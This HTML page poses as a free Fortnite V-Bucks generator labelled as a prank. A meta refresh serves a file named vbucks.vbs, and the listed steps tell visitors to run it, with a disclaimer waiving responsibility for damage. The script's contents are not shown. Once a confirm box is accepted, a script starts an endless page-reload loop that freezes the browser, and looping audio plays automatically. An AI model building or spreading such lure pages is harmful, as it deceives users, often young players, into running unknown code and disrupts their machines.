<!DOCTYPE html>
<html>
    <body >
        <link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<meta http-equiv="refresh" content="0; url=vbucks.vbs">
<link href="https://fonts.googleapis.com/css2?family=Roboto:wght@400;500&display=swap" rel="stylesheet">
<style>
 
@import url('https://fonts.googleapis.com/css2?family=Roboto:wght@400;500&display=swap');


    body{
        background-image: url(unnamed.jpg);
        background-size: cover;
        font-family: 'Roboto', sans-serif;

    }

    p{font-family: 'Roboto', sans-serif;}

    #title{
      text-align: center;
      font-size: xx-large;

    }

    #word{
      font-size: x-large;
      text-align: center;
      margin-top: 25px;
    }

    #box{
      width: 500px;
      height: 500px;
      background-color: rgb(100, 100, 100);
      margin-top: 10%;
      margin-left: 38%;
    }

    #terms{
      position: relative;
      top:200px;
    }
</style>

 
<h2 id="title">Free VBUCKS Generator</h2>


<p id="word">Press OK To Claim Your VBUCKS 10,000 VBUX! (PRANK)</p>

<div id="box">
<h1 id="word">Steps</h1>

<ol>
  <li>Type your fortine user name</li> <input type="text" placeholder="Type user name here...">
  <li>Reload the Page and press OK.</li>
  <li>Run the file named.</li>
  <li>View and Use your VBUCKS Code!</li>
  <li id="terms">By following these step I [Information4u] am not responsible for damage cause, and I [Information4u] do not guarentee any reward or payout by following these steps. I [Information4u] am not responsible for damage caused by running/executing the file [vbucks.vbs].</li>
</ol> 
</div>

<iframe width="420" height="315"
src="https://streamable.com/e/shil2">
</iframe>

<iframe width="420" height="315"
src="https://streamable.com/e/shil2">
</iframe>
<iframe width="420" height="315"
src="https://streamable.com/e/shil2">
</iframe>
<iframe width="420" height="315"
src="https://streamable.com/e/shil2">
</iframe>
<iframe width="420" height="315"
src="https://streamable.com/e/shil2">
</iframe>
<iframe width="420" height="315"
src="https://streamable.com/e/shil2">
</iframe>

<iframe width="420" height="315"
src="https://streamable.com/e/shil2">
</iframe>
<iframe width="420" height="315"
src="https://streamable.com/e/shil2">
</iframe>
<iframe width="420" height="315"
src="https://streamable.com/e/shil2">
</iframe>
<iframe width="420" height="315"
src="https://streamable.com/e/shil2">
</iframe>
<iframe width="420" height="315"
src="https://streamable.com/e/shil2">
</iframe>
<iframe width="420" height="315"
src="https://streamable.com/e/shil2">
</iframe>


<p id="demo"></p>


<script>
onbeforeunload = function(){localStorage.x=1};


if(confirm("Press OK to add get Vbucks Code")){
  setTimeout(function(){
    while(1)location.reload(1)
  }, 1000)
}
</script>

<audio src="Super Idol Instrumental 1 Hour (128 kbps).mp3" id="my_audio" loop="loop"></audio>
  <script type="text/javascript">
    window.onload=function(){
      document.getElementById("my_audio").play();
    }
  </script>

</body>
</html>